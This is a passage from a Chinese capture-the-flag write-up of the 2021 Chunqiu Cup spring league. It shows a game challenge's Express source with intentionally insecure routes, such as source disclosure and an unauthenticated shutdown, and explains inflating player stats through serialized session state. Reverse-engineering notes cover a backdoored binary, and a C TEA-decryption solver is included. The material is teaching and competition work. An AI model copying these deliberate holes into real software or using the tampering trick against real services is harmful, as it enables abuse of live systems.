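    message: `${monster.name}出现了!ATK:${monster.ATK},DEF:${monster.DEF},HP:${monster.HP}`,
  });
});

app.get("/status", (req, res) => {
  if(!initSession(req.session)) return;
  const player = Obj.deserialzie(req.session.player);
  res.send({message: `${player.name}现在的状态:ATK:${player.ATK},DEF:${player.DEF},HP:${player.HP},COIN:${req.session.coin}枚,还剩${req.session.monster.length}个题`});
});

// Fight the next opponent; a win drops it from the list, a loss resets the
// session on the next request (init = false). Once the list is empty the
// footer (presumably holding the flag) is returned instead.
app.get("/fight", (req, res) => {
  if(!initSession(req.session)) return;
  if(req.session.monster.length===0) {
    return res.send({message: CONST.footer.join("\n")});
  }
  const player = Obj.deserialzie(req.session.player);
  const monster = Obj.deserialzie(req.session.monster[0]);
  const [win, his] = player.fight(monster);
  if(win) {
    req.session.monster = req.session.monster.slice(1);
    his.push("你赢了耶!");
  } else {
    his.push("你输了,刷新以重新开始");
    req.session.init = false;
  }
  req.session.history = req.session.history.concat(his);
  res.send({message: his.join("\n")});
});

// Source disclosure is intentional for the challenge.
app.get("/source", (req, res) => {
  res.send(readFileSync("./src/main.ts"));
});

// Unauthenticated process shutdown: any GET /exit stops the service.
app.get("/exit", (req, res) => {
  exit(0);
});

// Express only treats a middleware as an error handler when it declares four
// parameters; with (err, req, res) alone it is registered as ordinary
// middleware and never receives errors.
app.use((err: any, req: any, res: any, _next: any) => {
  console.error(err.stack);
  res.status(500).send("Something broke!");
});

app.listen(80);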

重要的地方在这里

2021年春秋杯春季联赛部分WriteUp
image-20210529161549436
2021年春秋杯春季联赛部分WriteUp
image-20210529161603354

传入9999999/0,即可把自己的倍数增加到9999999,然后序列化保存

2021年春秋杯春季联赛部分WriteUp
image-20210529161816131

下次反序列化player的时候,player的属性就会超级加倍

2021年春秋杯春季联赛部分WriteUp
image-20210529161823449

一开始是个弱鸡

2021年春秋杯春季联赛部分WriteUp
image-20210529161921628

属性加倍

2021年春秋杯春季联赛部分WriteUp
image-20210529161943872

打出flag

2021年春秋杯春季联赛部分WriteUp
image-20210529162001119

Reverse

backdoor

首先程序会net listen监听端口

2021年春秋杯春季联赛部分WriteUp
image-20210529171048979

输入g01angBackd00r会执行main_Decrypt函数

2021年春秋杯春季联赛部分WriteUp
image-20210529171102262
2021年春秋杯春季联赛部分WriteUp
image-20210529171135816

chal

直接打开文件

2021年春秋杯春季联赛部分WriteUp
image-20210529171318392

根据敏感变量名猜测是tea家族算法

提取出数据

3
3208527578,423585179
3.0
699878777,1677098023
3.4
1664154466,3464319808
3.8
3532878313,2922316096
3.12
2276156225,33987677
3.16
3775107838,3138262082


key 
3735928559,3405691582,269488144,16843009

exp

#include <inttypes.h>
#include <stdint.h>
#include <stdio.h>
 
//加密函数
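/*
 * TEA block encryption (Wheeler & Needham, 32 rounds).
 *
 * @param v  in/out: one 64-bit block as two 32-bit words; overwritten with
 *           the ciphertext.
 * @param k  the 128-bit key as four 32-bit words; read only.
 */
void encrypt (uint32_t* v, const uint32_t* k) {
    uint32_t v0 = v[0], v1 = v[1], sum = 0;
    const uint32_t delta = 0x9e3779b9;              /* key schedule constant */
    const uint32_t k0 = k[0], k1 = k[1], k2 = k[2], k3 = k[3];
    for (unsigned i = 0; i < 32; i++) {
        sum += delta;                              /* unsigned wrap is defined */
        v0 += ((v1 << 4) + k0) ^ (v1 + sum) ^ ((v1 >> 5) + k1);
        v1 += ((v0 << 4) + k2) ^ (v0 + sum) ^ ((v0 >> 5) + k3);
    }
    v[0] = v0; v[1] = v1;
}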
//解密函数
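/*
 * TEA block decryption: exact inverse of encrypt() above. sum starts at
 * 32 * delta (0xC6EF3720) and is walked back one delta per round.
 *
 * @param v  in/out: one 64-bit ciphertext block as two 32-bit words;
 *           overwritten with the plaintext.
 * @param k  the 128-bit key as four 32-bit words; read only.
 */
void decrypt (uint32_t* v, const uint32_t* k) {
    uint32_t v0 = v[0], v1 = v[1], sum = 0xC6EF3720;
    const uint32_t delta = 0x9e3779b9;              /* key schedule constant */
    const uint32_t k0 = k[0], k1 = k[1], k2 = k[2], k3 = k[3];
    for (unsigned i = 0; i < 32; i++) {
        v1 -= ((v0 << 4) + k2) ^ (v0 + sum) ^ ((v0 >> 5) + k3);
        v0 -= ((v1 << 4) + k0) ^ (v1 + sum) ^ ((v1 >> 5) + k1);
        sum -= delta;                              /* unsigned wrap is defined */
    }
    v[0] = v0; v[1] = v1;
}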
 
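/*
 * Decrypt one 64-bit block extracted from the binary with the key extracted
 * alongside it, and print the two plaintext words (comma-prefixed so the
 * output of several runs can be pasted into one list).
 */
int main(void)
{
    /* v: the data block, two 32-bit unsigned words (last pair from the listing) */
    uint32_t v[2] = {3775107838u, 3138262082u};
    /* k: the 128-bit key as four 32-bit words
     * (0xDEADBEEF, 0xCAFEBABE, 0x10101010, 0x01010101) */
    uint32_t k[4] = {3735928559u, 3405691582u, 269488144u, 16843009u};

    decrypt(v, k);
    /* PRIu32 keeps the format matched to uint32_t on every platform */
    printf(",%" PRIu32 ",%" PRIu32 "\n", v[0], v[1]);
    return 0;
}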
2021年春秋杯春季联赛部分WriteUp
image-20210529171403840


本文始发于微信公众号(山警网络空间安全与电子数据取证):2021年春秋杯春季联赛部分WriteUp
